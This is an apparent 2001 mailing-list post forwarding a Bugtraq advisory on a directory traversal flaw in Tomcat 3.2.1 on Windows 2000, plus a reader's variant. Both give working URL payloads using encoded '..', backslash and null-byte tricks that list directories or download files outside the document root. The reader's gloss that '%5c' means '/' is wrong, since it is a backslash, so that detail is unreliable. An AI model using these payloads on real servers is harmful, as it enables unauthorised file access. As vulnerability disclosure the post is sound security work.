Hi.
 
Below is a sniplet of a mail sent to Buqtraq last weekend.
I've been playing around with this a bit and I discovered that you
can also download files using an url like this:
 
http://target:8080/%2e%2e/%2e%2e%5cfilenamehere%00.jsp
(%5c = "/")
 
this will give you the file you want.
 
Stian Myhre
Norway.
 
 
on 3/30/01 11:26 PM, "lovehacker" <lovehacker@263.NET> wrote:

> Topic:
> Tomcat 3.2.1 for win2000 Directory traversal
> Vulnerability
>
> vulnerable:
> Tomcat 3.2.1 for win2000
> maybe for other operating system also.
>
> discussion:
> A security vulnerability has been found in Windows
> NT/2000 systems that have Tomcat 3.2.1
> installed.The
> vulnerability allows remote attackers to access files
> outside the document root directory scope.
>
> exploits:
> http://target:8080/%2e%2e/%2e%2e/%00.jsp
> It is possible to cause the Tomcat server to Listing
> outside the document root directory scope.
>
> solution:
> None
>
> Copyright 2000-2001 CHINANSL. All Rights
> Reserved. Terms of use.
>
> CHINANSL Security Team
> <lovehacker@chinansl.com>
> CHINANSL INFORMATION TECHNOLOGY CO.,LTD
> (http://www.chinansl.com)